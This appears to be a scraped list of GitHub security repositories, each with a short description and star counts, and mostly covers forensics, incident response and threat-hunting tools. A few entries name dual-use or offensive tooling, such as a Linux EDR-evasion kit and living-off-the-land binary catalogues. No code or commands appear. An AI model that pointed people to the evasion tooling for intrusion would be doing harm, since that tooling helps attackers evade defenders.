github-watchmanMonitoring GitHub for sensitive data shared publicly
Stars: ✭ 60 (-31.82%)
hashlookup-forensic-analyserAnalyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service - https://circl.lu/services/hashlookup/
Stars: ✭ 43 (-51.14%)
DetectionlabAutomate the creation of a lab environment complete with security tooling and logging best practices
Stars: ✭ 3,237 (+3578.41%)
LolbasLiving Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Stars: ✭ 1,506 (+1611.36%)
ad-privileged-auditProvides various Windows Server Active Directory (AD) security-focused reports.
Stars: ✭ 42 (-52.27%)
LolbasLiving Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Stars: ✭ 3,810 (+4229.55%)
OrianaOriana is a threat hunting tool that leverages a subset of Windows events to build relationships, calculate totals and run analytics. The results are presented in a Web layer to help defenders identify outliers and suspicious behavior on corporate environments.
Stars: ✭ 152 (+72.73%)
Vast🔮 Visibility Across Space and Time
Stars: ✭ 227 (+157.95%)
TimesketchCollaborative forensic timeline analysis
Stars: ✭ 1,795 (+1939.77%)
PackratLive system forensic collector
Stars: ✭ 16 (-81.82%)
MalwlessTest Blue Team detections without running any attack.
Stars: ✭ 215 (+144.32%)
MaliceVirusTotal Wanna Be - Now with 100% more Hipster
Stars: ✭ 1,253 (+1323.86%)
ThehiveTheHive: a Scalable, Open Source and Free Security Incident Response Platform
Stars: ✭ 2,300 (+2513.64%)
LogontracerInvestigate malicious Windows logon by visualizing and analyzing Windows event log
Stars: ✭ 1,914 (+2075%)
Blue-BaronAutomate creating resilient, disposable, secure and agile monitoring infrastructure for Blue Teams.
Stars: ✭ 23 (-73.86%)
CacadorIndicator Extractor
Stars: ✭ 115 (+30.68%)
Atc ReactA knowledge base of actionable Incident Response techniques
Stars: ✭ 226 (+156.82%)
Awesome ForensicsA curated list of awesome forensic analysis tools and resources
Stars: ✭ 1,775 (+1917.05%)
cytroneCyTrONE: Integrated Cybersecurity Training Framework
Stars: ✭ 72 (-18.18%)
Sysmon ModularA repository of sysmon configuration modules
Stars: ✭ 1,229 (+1296.59%)
Dfir OrcForensics artefact collection tool for systems running Microsoft Windows
Stars: ✭ 202 (+129.55%)
Lw YaraYara Ruleset for scanning Linux servers for shells, spamming, phishing and other webserver baddies
Stars: ✭ 78 (-11.36%)
MimirSmart OSINT collection of common IOC types
Stars: ✭ 63 (-28.41%)
CCXDiggerThe CyberCX Digger project is designed to help Australian organisations determine if they have been impacted by certain high profile cyber security incidents. Digger provides threat hunting functionality packaged in a simple-to-use tool, allowing users to detect certain attacker activities; all for free.
Stars: ✭ 45 (-48.86%)
PypowershellxrayPython script to decode common encoded PowerShell scripts
Stars: ✭ 192 (+118.18%)
ScriptingPS / Bash / Python / Other scripts For FUN!
Stars: ✭ 47 (-46.59%)
ZombieantZombie Ant Farm: Primitives and Offensive Tooling for Linux EDR evasion.
Stars: ✭ 169 (+92.05%)
LokiLoki - Simple IOC and Incident Response Scanner
Stars: ✭ 2,217 (+2419.32%)
TheHiveHooksThis is a python tool aiming to make using TheHive webhooks easier.
Stars: ✭ 22 (-75%)
Thehive4pyPython API Client for TheHive
Stars: ✭ 143 (+62.5%)
DfirtrackDFIRTrack - The Incident Response Tracking Application
Stars: ✭ 232 (+163.64%)
MthcAll-in-one bundle of MISP, TheHive and Cortex
Stars: ✭ 134 (+52.27%)
CirtkitTools for the Computer Incident Response Team 💻
Stars: ✭ 117 (+32.95%)
Threathunter PlaybookA Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.
Stars: ✭ 2,879 (+3171.59%)
pyarascannerA simple many-rules to many-files YARA scanner for incident response or malware zoos.
Stars: ✭ 23 (-73.86%)
HistoricprocesstreeAn Incident Response tool that visualizes historic process execution evidence (based on Event ID 4688 - Process Creation Event) in a tree view.
Stars: ✭ 46 (-47.73%)
KiewtaiA port of Kaitai to the Hiew hex editor
Stars: ✭ 108 (+22.73%)
UserlineQuery and report user logons relations from MS Windows Security Events
Stars: ✭ 221 (+151.14%)
ThreathuntThreatHunt is a PowerShell repository that allows you to train your threat hunting skills.
Stars: ✭ 92 (+4.55%)
SlidesMisc Threat Hunting Resources
Stars: ✭ 203 (+130.68%)
Signature BaseSignature base for my scanner tools
Stars: ✭ 1,212 (+1277.27%)
EventTranscript.db-ResearchA repo for centralizing ongoing research on the new Windows 10/11 DFIR artifact, EventTranscript.db.
Stars: ✭ 33 (-62.5%)
Etl ParserEvent Trace Log file parser in pure Python
Stars: ✭ 66 (-25%)
PockintA portable OSINT Swiss Army Knife for DFIR/OSINT professionals 🕵️ 🕵️ 🕵️
Stars: ✭ 196 (+122.73%)
AutotimelinerAutomagically extract forensic timeline from volatile memory dump
Stars: ✭ 54 (-38.64%)
ezEmuSee adversary, do adversary: Simple execution of commands for defensive tuning/research (now with more ELF on the shelf)
Stars: ✭ 89 (+1.14%)
YetiYour Everyday Threat Intelligence
Stars: ✭ 1,037 (+1078.41%)
LinuxforensicsEverything related to Linux Forensics
Stars: ✭ 189 (+114.77%)
assisted-log-enabler-for-awsAssisted Log Enabler for AWS - Find AWS resources that are not logging, and turn them on.
Stars: ✭ 167 (+89.77%)
MalcomMalcom - Malware Communications Analyzer
Stars: ✭ 988 (+1022.73%)
WhidsOpen Source EDR for Windows
Stars: ✭ 188 (+113.64%)
BeagleBeagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
Stars: ✭ 976 (+1009.09%)
Forensic ToolsCIRCL system forensic tools or a jumble of tools to support forensic
Stars: ✭ 27 (-69.32%)
Misp WarninglistsWarning lists to inform users of MISP about potential false-positives or other information in indicators
Stars: ✭ 184 (+109.09%)
zeek-docsDocumentation for Zeek
Stars: ✭ 41 (-53.41%)
NIST-to-TechAn open-source listing of cybersecurity technology mapped to the NIST Cybersecurity Framework (CSF)
Stars: ✭ 61 (-30.68%)